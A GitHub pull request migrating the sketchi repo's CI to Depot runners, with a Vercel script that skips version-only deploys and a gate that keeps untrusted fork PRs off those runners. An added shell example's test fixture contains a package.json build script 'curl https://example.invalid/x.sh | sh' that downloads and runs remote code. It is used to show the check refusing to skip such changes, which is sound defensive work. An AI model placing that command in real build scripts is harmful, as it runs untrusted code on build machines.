
chore(ci): align runners and tighten release deploys #212

Merged: anand-testcompare merged 16 commits into main from chore/align-ci-with-prismantix-depot-runners on May 21, 2026

Conversation


@anand-testcompare anand-testcompare commented May 20, 2026

Summary

  • move non-release CI, E2E, and OpenCode build/bundle/PR workflows from Blacksmith to Depot GitHub runners
  • keep release/publish flows on GitHub-hosted runners for provenance/OIDC-sensitive paths
  • update core GitHub Actions to the PrismantiX-era versions and teach actionlint about Depot runner labels
  • make cd-release fall back to immediate merge when repo auto-merge is disabled
  • skip Vercel web builds for root package.json version-only bump commits while still building on real package/dependency/script changes

Verification

  • actionlint .github/workflows/*.yml
  • git diff --check
  • bash -n scripts/vercel-ignore-web-build.sh
  • Vercel ignore simulation: 1bb539e -> 193cdbb exits 0 / skips version-only package bump
  • Vercel ignore simulation: 7a87483 -> 1bb539e exits 1 / builds runtime merge
  • bun x ultracite fix
  • bun run check-types

Current blocker

Draft until Depot GitHub Actions runners are enabled for shpitdev/sketchi. Repo runner list is empty and org runners currently expose Blacksmith labels only, so depot-ubuntu-* jobs queue without steps.

Notes

  • CodeQL default setup was disabled in GitHub settings; Sketchi does not have repo-owned CodeQL YAML and PrismantiX does not run CodeQL/Semgrep.
  • This intentionally does not introduce Nx yet; it keeps Sketchi Bun/Vercel behavior while matching PrismantiX runner ergonomics where applicable.
  • Existing release-please PR chore(main): release opencode-excalidraw 0.0.10 #202 was already open before this branch.


vercel Bot commented May 20, 2026

The latest updates on your projects. Learn more about Vercel for GitHub.

sketchi-web: deployment Ready (Preview, Comment), updated May 20, 2026 4:46am UTC


@anand-testcompare (Collaborator, Author) commented:

Status update: this PR is intentionally draft for now.

The workflow YAML validates locally and the GitHub-hosted checks started, but every Depot-labeled job stayed queued with no steps:

  • convex-tests -> depot-ubuntu-24.04-4
  • opencode-excalidraw -> depot-ubuntu-24.04
  • api-tests -> depot-ubuntu-24.04
  • e2e -> depot-ubuntu-24.04

I checked runner availability:

  • gh api repos/shpitdev/sketchi/actions/runners --paginate -> total_count: 0
  • gh api orgs/shpitdev/actions/runners --paginate -> Blacksmith labels only; no depot-ubuntu-* labels

I canceled the queued runs so they do not sit indefinitely. To make this PR mergeable, install/enable Depot GitHub Actions runners for shpitdev/sketchi (including public repo runner-group access if needed), then push a no-op commit or rerun the workflows.

@anand-testcompare changed the title from "chore(ci): align workflows with Depot runners" to "chore(ci): align runners and tighten release deploys" on May 20, 2026
@anand-testcompare (Collaborator, Author) commented:

Follow-up update:

  • Disabled GitHub CodeQL default setup for this repo. Confirmed via gh api repos/shpitdev/sketchi/code-scanning/default-setup: state=not-configured.
  • Added fix(vercel): skip version-only package deploys (a857e93). This keeps Vercel builds for real root package.json changes, but skips automated version-only bumps like 0.7.47 -> 0.7.48.
  • Verified locally:
    • bash -n scripts/vercel-ignore-web-build.sh
    • actionlint .github/workflows/*.yml
    • git diff --check
    • bun x ultracite fix
    • bun run check-types
    • Vercel ignore simulation for 1bb539e -> 193cdbb exits 0 / skips version-only bump
    • Vercel ignore simulation for 7a87483 -> 1bb539e exits 1 / builds real runtime merge

Vercel still created a preview deployment for this PR because the PR itself changes the ignore script, which is expected. I canceled the queued Depot-backed E2E runs again because Depot runner labels are still not attached to this repo.
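The ignore-script behaviour described in the comments above (Vercel convention: exit 0 skips the build, exit 1 builds; skip only a version-only bump of the root package.json), as an added example. This is not the repository's scripts/vercel-ignore-web-build.sh. The function names, the constructed package.json fixtures, and the reliance on the Vercel-provided VERCEL_GIT_COMMIT_SHA / VERCEL_GIT_PREVIOUS_SHA variables plus a clone that contains both commits are assumptions of this example.

```shell
#!/bin/sh
# Added example, not the project's scripts/vercel-ignore-web-build.sh.
# Vercel ignored-build-step convention: exit 0 = skip the build, exit 1 = build.

# strip_version JSON: print JSON without its top-level "version" line.
# Only a line that is exactly `"version": "<x>"` (optional trailing comma) is
# removed, so a version line that also carries another key, or a pinned
# dependency elsewhere in the file, never disappears from the comparison.
strip_version() {
  printf '%s\n' "$1" |
    sed '/^[[:space:]]*"version":[[:space:]]*"[^"]*",\{0,1\}[[:space:]]*$/d'
}

# package_json_is_version_only OLD_JSON NEW_JSON: 0 when the two documents
# differ and the only differing line is the version line; 1 otherwise.
package_json_is_version_only() {
  [ "$1" != "$2" ] || return 1
  [ "$(strip_version "$1")" = "$(strip_version "$2")" ]
}

# should_skip_build CHANGED_FILES OLD_JSON NEW_JSON: 0 (skip) only when the
# commit range touched nothing but the root package.json and that file changed
# only its version. A new dependency, a changed script, or any second file
# (lockfile included) means 1 (build).
should_skip_build() {
  [ "$1" = "package.json" ] || return 1
  package_json_is_version_only "$2" "$3"
}

# Constructed fixtures so the decision can be exercised offline.
OLD_PKG=$(printf '{\n  "name": "sketchi",\n  "version": "0.7.47",\n  "scripts": {\n    "build": "bun run build"\n  }\n}')
BUMP_PKG=$(printf '{\n  "name": "sketchi",\n  "version": "0.7.48",\n  "scripts": {\n    "build": "bun run build"\n  }\n}')
BUMP_PLUS_SCRIPT_PKG=$(printf '{\n  "name": "sketchi",\n  "version": "0.7.48",\n  "scripts": {\n    "build": "curl https://example.invalid/x.sh | sh"\n  }\n}')

# Vercel wiring (assumed environment: VERCEL_GIT_COMMIT_SHA and
# VERCEL_GIT_PREVIOUS_SHA set by Vercel, and a clone containing both commits).
# Outside Vercel this block is skipped. A first deploy with no previous SHA, or
# any git failure, falls through to a build: the safe default is to build.
if [ -n "${VERCEL_GIT_COMMIT_SHA:-}" ]; then
  prev=${VERCEL_GIT_PREVIOUS_SHA:-}
  [ -n "$prev" ] || exit 1
  files=$(git diff --name-only "$prev" "$VERCEL_GIT_COMMIT_SHA") || exit 1
  old=$(git show "$prev:package.json") || exit 1
  new=$(git show "$VERCEL_GIT_COMMIT_SHA:package.json") || exit 1
  if should_skip_build "$files" "$old" "$new"; then
    echo "version-only root package.json bump; skipping web build"
    exit 0
  fi
  exit 1
fi
```

The strictness is the point: an automated "version bump" commit is a convenient place to hide a scripts or dependency change, so the check compares the whole file minus exactly one version line and additionally requires package.json to be the only changed path. Anything that does not match that shape builds, and every failure path also builds.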

@anand-testcompare anand-testcompare marked this pull request as ready for review May 20, 2026 02:09

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment


💡 Codex Review

Here are some automated review suggestions for this pull request.

Reviewed commit: e85c0b1c41

ℹ️ About Codex in GitHub

Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you

  • Open a pull request for review
  • Mark a draft as ready
  • Comment "@codex review".

If Codex has suggestions, it will comment; otherwise it will react with 👍.

Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".

Comment thread .github/workflows/ci-tests.yml

github-actions Bot commented May 20, 2026

Browserbase Replays

  • Session 2ab5516b-f021-4740-92c4-874f490b82a1 (scenario: visual-sanity.ts): replay | debug
  • Session 451ef8ec-91e2-4929-8156-70dbd505ff44 (scenario: auth-gates.ts): replay | debug
  • Session c0acb614-8cd1-4982-a0b0-ca5a36f6bd4f (scenario: opencode-web-continuity.ts): replay | debug
  • Session bc018866-c63b-463f-926e-b34aa78c3044 (scenario: diagram-studio-happy-path.ts): replay | debug
  • Session 59949af0-91bb-4b47-8ce3-7b4ab7a10200 (scenario: diagram-studio-occ-conflict.ts): replay | debug

Workflow run: 26141902615


@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

💡 Codex Review

Reviewed commit: 65f62f8dfa

Comment thread .github/workflows/e2e-api.yml Outdated
Comment thread .github/workflows/e2e-web.yml Outdated
@anand-testcompare
Copy link
Copy Markdown
Collaborator Author

Depot runner + security follow-up:

  • Fixed the remaining GitHub org permission: the shpitdev Default runner group is now visibility=selected, includes shpitdev/sketchi, and allows_public_repositories=true. Depot's docs say managed runners register into the Default runner group, so this was the missing public-repo bit.
  • Pushed 65f62f8 to lock Depot-backed PR execution down to trusted same-repo PRs only:
    • ci-tests and opencode-excalidraw-pr require head.repo.full_name == github.repository and author association of OWNER, MEMBER, or COLLABORATOR.
    • preview E2E now resolves the Vercel deployment SHA back to an associated PR and skips if there is no PR, the PR is from a fork, the author association is untrusted, or the actor is Dependabot.
  • This keeps the repo public while avoiding the public-fork/self-hosted-runner/cache-poisoning shape. Depot cache is repo-scoped but not branch-isolated, so the safe stance is to keep untrusted PR code off Depot runners entirely.

Verification:

  • actionlint .github/workflows/*.yml - passed
  • git diff --check - passed
  • bun x ultracite fix - passed, no fixes applied
  • bash -n scripts/vercel-ignore-web-build.sh - passed
  • bun run check-types - passed / no tasks executed by turbo
  • Depot jobs now start and execute:
    • convex-tests: success on run 26137228676
    • opencode-excalidraw: success on run 26137228695
    • Vercel preview: success

Remaining blocker is not runner setup:

  • e2e-api fails in real API assertions after auth/device checks pass. All diagram actions return Convex NoAuthProvider from the preview backend, e.g. diagrams.generateDiagram failed ... No auth provider found matching the given token.
  • e2e-web passes visual/auth-gate smoke, then fails in authenticated continuity because the WorkOS email input did not appear. Browserbase replay was posted by the workflow.

So the Depot migration and public-runner permission path are working now. The PR is blocked on existing preview auth/E2E behavior, not on queued runners anymore.
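The trust gate described in the comment above (same-repo head, author association OWNER/MEMBER/COLLABORATOR, deployment SHA resolved back to its PRs, Dependabot excluded), as an added example written as a pure TypeScript function. It is not the repository's workflow code. The function and fixture names are invented for the example, the GitHub Actions expression in the header comment is an assumed equivalent rather than a copy of the PR's YAML, and the PR objects are constructed in the shape GitHub's API returns.

```typescript
// Added example, not the repository's workflow code. It implements the gate the comment
// above describes as a pure function so it can be tested offline. The job-level GitHub
// Actions expression it mirrors (assumed YAML, not copied from the PR) is:
//
//   if: >-
//     github.event.pull_request.head.repo.full_name == github.repository &&
//     contains(fromJSON('["OWNER","MEMBER","COLLABORATOR"]'),
//              github.event.pull_request.author_association)
//
// The condition belongs on the job, not a step: a step-level `if` is only evaluated after
// the job has already been scheduled onto the Depot runner.

type AuthorAssociation =
  | "OWNER" | "MEMBER" | "COLLABORATOR" | "CONTRIBUTOR"
  | "FIRST_TIME_CONTRIBUTOR" | "FIRST_TIMER" | "MANNEQUIN" | "NONE";

// Subset of a GitHub pull request object the gate reads. For the preview E2E path the list
// comes from GET /repos/{owner}/{repo}/commits/{sha}/pulls (the deployment SHA mapped back
// to its PRs); for the PR workflows it is the single PR from the event payload.
interface PullRequestLike {
  number: number;
  author_association: AuthorAssociation; // relative to the base repo, not the fork
  head: { repo: { full_name: string } | null }; // null once a fork has been deleted
  user: { login: string };
}

interface GateDecision {
  run: boolean;
  reason: string;
}

const TRUSTED_ASSOCIATIONS: ReadonlySet<AuthorAssociation> = new Set<AuthorAssociation>(
  ["OWNER", "MEMBER", "COLLABORATOR"],
);
const DEPENDABOT_LOGIN = "dependabot[bot]";

// decideDepotRun: may a Depot-backed job run for this commit? `pulls` is empty when the
// commit has no associated PR. Every refusal carries a reason for the skipped-job log.
function decideDepotRun(
  pulls: readonly PullRequestLike[],
  repository: string,
  actor: string,
): GateDecision {
  if (actor === DEPENDABOT_LOGIN) {
    return { run: false, reason: "actor is Dependabot" };
  }
  if (pulls.length === 0) {
    return { run: false, reason: "no pull request is associated with this commit" };
  }
  // A commit can sit in several PRs. All of them must pass, otherwise an untrusted PR could
  // ride on a trusted PR that happens to contain the same commit.
  for (const pr of pulls) {
    const headRepo = pr.head.repo?.full_name ?? "<deleted fork>";
    if (headRepo !== repository) {
      return { run: false, reason: `PR #${pr.number} head is ${headRepo}, not ${repository}` };
    }
    if (!TRUSTED_ASSOCIATIONS.has(pr.author_association)) {
      return {
        run: false,
        reason: `PR #${pr.number} author association ${pr.author_association} is not trusted`,
      };
    }
    if (pr.user.login === DEPENDABOT_LOGIN) {
      return { run: false, reason: `PR #${pr.number} was opened by Dependabot` };
    }
  }
  return { run: true, reason: "same-repo pull request from a trusted author" };
}

// Constructed fixtures (not real PRs) in the shape the API returns.
const REPO = "shpitdev/sketchi";
const trustedPr: PullRequestLike = {
  number: 1,
  author_association: "COLLABORATOR",
  head: { repo: { full_name: REPO } },
  user: { login: "maintainer" },
};
// An org member working from a personal fork: the association is trusted, the head repo is
// not. Only the head-repo check stops this one, which is why both checks are needed.
const memberForkPr: PullRequestLike = {
  number: 2,
  author_association: "MEMBER",
  head: { repo: { full_name: "someone/sketchi" } },
  user: { login: "someone" },
};
const firstTimerPr: PullRequestLike = {
  number: 3,
  author_association: "FIRST_TIME_CONTRIBUTOR",
  head: { repo: { full_name: REPO } },
  user: { login: "newcomer" },
};
```

The two conditions are not redundant: the head-repo check is what keeps code that nobody with write access pushed off the runner, while the association check covers same-repo branches the repository's own automation or bots create. Because the Depot cache is repo-scoped rather than branch-isolated, a single untrusted job that gets through either check can poison entries that later main-branch jobs read, which is why every refusal path returns run: false rather than degrading to a smaller job.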


@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

💡 Codex Review

Reviewed commit: 159aa6be63

Comment thread packages/backend/convex/auth.config.ts Outdated

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

💡 Codex Review

Reviewed commit: de0c8323e9

Comment thread tests/e2e/src/runner/auth.ts Outdated

@chatgpt-codex-connector chatgpt-codex-connector Bot left a comment

💡 Codex Review

Reviewed commit: a637a1a8b5

Comment thread scripts/configure-workos-jwt-template.mjs Outdated
@anand-testcompare anand-testcompare merged commit 2f4da98 into main May 21, 2026
6 checks passed
@anand-testcompare anand-testcompare deleted the chore/align-ci-with-prismantix-depot-runners branch May 21, 2026 05:14